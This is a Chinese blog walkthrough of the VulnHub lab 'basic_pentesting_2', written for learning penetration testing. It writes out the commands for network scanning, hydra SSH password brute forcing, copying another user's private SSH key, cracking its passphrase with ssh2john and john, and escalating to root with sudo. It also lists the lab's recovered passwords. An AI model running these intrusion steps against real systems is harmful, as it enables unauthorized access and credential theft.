Vulnhub系列:basic_pentesting_2

最新推荐文章于 2024-08-09 11:17:49 发布
最新推荐文章于 2024-08-09 11:17:49 发布
阅读量398 收藏 3
点赞数 5
分类专栏: vulnhub系列 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jq_j37/article/details/140936203
版权

Vulnhub系列:basic_pentesting_2

靶机下载

一、信息收集

nmap扫描存活,根据mac地址寻找IP

nmap 192.168.23.0/24

image-20240805182223956

nmap扫描端口,开放端口:22、80、139、445、8009、8080

nmap 192.168.23.179 -p- -A -sV -Pn

image-20240805182351505

dirb目录扫描,存在目录development

dirb http://192.168.23.179/

image-20240805182745836

访问80端口,提示正在维护

image-20240805182438037

f12查看源码,有一个提示,查看他们的开发笔记

image-20240805182719365

访问development,发现dev.txt和j.txt

image-20240805182835855

dev.txt内容

image-20240805183046789

j.txt内容

image-20240805183107030

翻译了一下,-K在说 J 这个用户是一个弱口令,很容易就破解了他的密码,kali扫描一下

enum4linux 192.168.23.179

扫描到了 kay 和 jan,应该就是之前的 K 和 J

image-20240805183613084

二、getshell

因为提到了 J 存在弱口令,所以使用hydra工具尝试爆破ssh

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://192.168.23.179 -t 64

image-20240805185744078

得到密码 armando

jan:armando

ssh连接 jan 用户,连接成功

ssh jan@192.168.23.179

image-20240805184745966

三、提权

sudo -l 查看当前权限,没有可利用的,查看用户家目录下,在kay目录下发现pass.pak和ssh公私钥文件

image-20240805185524846

查看pass.pak文件,没有权限

image-20240805185613749

进入.ssh目录

image-20240805185646536

查看私钥文件

cat id_rsa

image-20240805185723808

将内容复制到 kali 中,并赋予权限

chmod 600 id_rsa

尝试利用私钥连接,需要密码

ssh -i id_rsa kay@192.168.23.179

image-20240805190259647

利用 ssh2john 将 id_rsa 转换为哈希

ssh2john id_rsa > 1.txt

image-20240805190437263

使用 john 进行解密,得到密码 beeswax

john --wordlist=/usr/share/wordlists/rockyou.txt 1.txt

image-20240805190605381

再次使用私钥登录,登录成功

ssh -i id_rsa kay@192.168.23.179
beeswax

image-20240805190725463

查看当前权限,需要的密码不是登录密码

image-20240805190931007

查看之前的 pass.pak,这个可能是需要的密码

heresareallystrongpasswordthatfollowsthepasswordpolicy$$

image-20240805190901130

再次查看权限,输入密码,成功显示

sudo -l

image-20240805191101403

显示为all,直接sudo su提权,提权成功

image-20240805191148070

三天三夜睡不着
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机:basic_pentesting_2
qq_48904485的博客
02-29 429
运行环境:Virtualbox攻击机:kali(10.0.2.4)靶机:basic_pentesting_2(10.0.2.7)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/basicpentesting/basic_pentesting_2.tar.gz。
Vulnhub靶机:basic_pentesting_1
qq_48904485的博客
02-29 432
运行环境:Virtualbox攻击机:kali(10.0.2.4)靶机:basic_pentesting_1(10.0.2.6)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/basic-pentesting-1,216/
[Vulnhub] basic_pentesting_1
weixin_63231007的博客
07-01 589
靶机:192.168.236.133 访问试试,没有得到可用信息。 获得了ftp服务的版本,想搜索一下该版本是否有可利用的漏洞的话,可用msfconsole 发现了一个该版本可利用漏洞 使用use命令,输入序号即可,0 进入该漏洞 exploitshow options 看一下参数,一个是RHOSTS 一个是RPORT 通过set命令来设置一下地址和端口,set RHOSTS 192.168.236.133下一步设置payload:set payload cmd/unix/reverse 这个是反向连接的
[Vulnhub] basic_pentesting 2
weixin_63231007的博客
07-12 699
目录信息搜集 S2-052漏洞利用 Hydra爆破jan密码(1) vim读取密码 (2) ssh公钥私钥获取身份登录凭据下载链接:Basic Pentesting: 2 ~ VulnHubnmap -sP 192.168.236.0/24 扫描一下靶机ipnetdiscover -i eth0 -r 192.168.1.0/24靶机ip : 192.168.236.138nmap -A 192.168.236.138 扫描一下靶机的具体信息。 收集靶场环境的服务和端口信息我们可以看见139和4...
靶机渗透测试:basic_pentesting_1靶机提权
x_13579的博客
04-13 769
靶场提权
Vulnhubbasic_pentesting_1
zhangshuaiijie的博客
06-29 162
三个端口,ftp,ssh,http看来突破口不在网站上,那就看看是不是ftp,ssh和apache的问题,nmap扫描版本这个版本正确,而且msf上有。
靶场练习第五天~vulnhub靶场之basic_pentesting_1
qq_57976347的博客
01-30 757
一、信息收集 1.主机发现 (1)Netdiscover:专用的二层发现工具,拥有主动和被动发现两种方式 具体操作如下,查看一下kali的ip 然后使用命令sudo netdiscover,发现了靶机的ip 2.端口扫描,服务识别 (1)使用nmap -A 开放的端口以及靶场操作系统和版本的探测,使用方法:nmap -A 192.168.101.106 二、后渗透 1.根据服务版本搜索相关漏洞 这里用到msfconsole,关于msfconsole介绍:msfconsole..
Vulnhub靶场渗透-basic_pentesting_1
paidx0
09-22 649
前言 靶机ip(192.168.110.134) 攻击机ip(192.168.110.127) 网络NAT模式 这次的靶场比较简单,却绕了挺大弯的 信息收集 找到隐藏页 简单翻了一下也没啥可以利用的东西,继续扫隐藏页目录 找到一些看似有用其实没啥用的东西,比如WordPress的登录页,文件包含页 这全都是误导,显然我被骗了,一直在爆破登录页和一个一个文件的看,文件数量太多了浪费很多时间 正确解法 重新回到nmap,这次不偷懒,更详细的扫描一下服务的版本号 nmap -A -v 192.168
vulnhub靶场】​basic_pentesting_2靶机​提权
qq_46421742的博客
08-03 332
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
RustScan::robot_face:现代端口扫描仪:robot_face:
02-02
:right_arrow_selector: | | :left_arrow_selector: 现代端口扫描仪。 快速,智能,有效。 docker pull rustscan/rustscan:2.0.0 yay -S rustscan brew install rustscan :thinking_face: 这是什么?...
java红酒网站源码-pentesting_Notes:pentesting_Notes
06-05
java网站源码Pentesting Pratic Notes(备忘单) 文件检测和提取器: file targetFile strings targetFile | grep flag strings -o targetFile strings -a targetFile strings -t d targetFile strings -f ...
Ciphey::high_voltage:在不知道密钥或密码的情况下自动解密加密,解码编码和破解哈希:high_voltage:
01-30
翻译 :right_arrow_selector: | | :left_arrow_selector: 使用自然语言处理和人工智能以及一些常识的全自动解密/解码/破解工具。 python3 -m pip install ciphey --upgrade docker run -it --rm remnux/ciphey...
endgame:AWS Pentesting工具,可让您使用单行命令将流氓AWS账户后门AWS账户的资源-或与整个Internet共享资源:smiling_face_with_horns:
03-04
一个AWS Pentesting工具,可让您使用单一命令将流氓AWS账户后门AWS账户的资源-或与整个Internet共享资源 :smiling_face_with_horns: TL; DR : endgame smash --service all通过与恶意IAM用户/角色或整个Internet...
信息安全_数据安全_Pentesting ICS 102.pdf
08-22
信息安全_数据安全_Pentesting ICS 102 信息保护 网络安全 web安全 网络安全 安全设计
《密码编码学与网络安全原理与实践》第九章 第十章 公钥密码学与密钥管理
最新发布
m0_57291352的博客
08-09 602
原则上不能说传统密码优于公钥密码,也不能说公钥密码优于传统密码公钥密码学仅限于用在密钥管理和签名这类应用中与密钥分配中心的会话过程既不比传统密码中的那些过程更简单,也不比之更有效动机:简化密钥分配和管理、实现签名等功能不对称性是公钥最为重要的性质,可以用来保证“真实”性,“不可否认”性非对称密钥:两个密钥:公钥和私钥,用来实现互补运算,即加密和解密,或者生成签名与验证签名;公钥证书:认证机构将用户的姓名和公钥绑定在一起,用户用自己的私钥对数字文件签名后,可以通过证书识别签名者,因为签名者是唯一拥有与证书上对
网络安全】本地文件包含及远程文件包含漏洞详解
goldfish8848的博客
08-05 874
开发人员将需要重复调用的函数写入一个文件,对该文件进行包含时产生的操作。这样编写代码能减少冗余,降低代码后期维护难度。保证网站整体风格统一:导航栏、底部footer栏等,把这些不会变的东西包含在一个文件中,可以保证整体效果的统一和代码量的减少。
网络安全入门教程(非常详细)从零基础入门到精通!
2301_77160226的博客
08-05 1037
网络安全领域犹如一座深邃的知识宝库,从零基础入门到精通是一段充满挑战但也充满收获的旅程。这不仅需要您对知识的不懈追求,更需要大量的实践与经验积累。希望本教程能够为您的网络安全学习之路点亮明灯,引领您在这个充满机遇与挑战的领域中稳步前行,最终成为一名优秀的网络安全专家,为构建安全的网络世界贡献自己的力量!
网络安全】探索AI 聊天机器人工作流程实现RCE
等风来
08-06 191
我发现了一个广泛使用的AI聊天机器人平台中的远程代码执行漏洞。该漏洞存在于聊天机器人的自定义工作流响应代码中,这些工作流允许开发人员通过创建定制的流程来扩展机器人的功能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值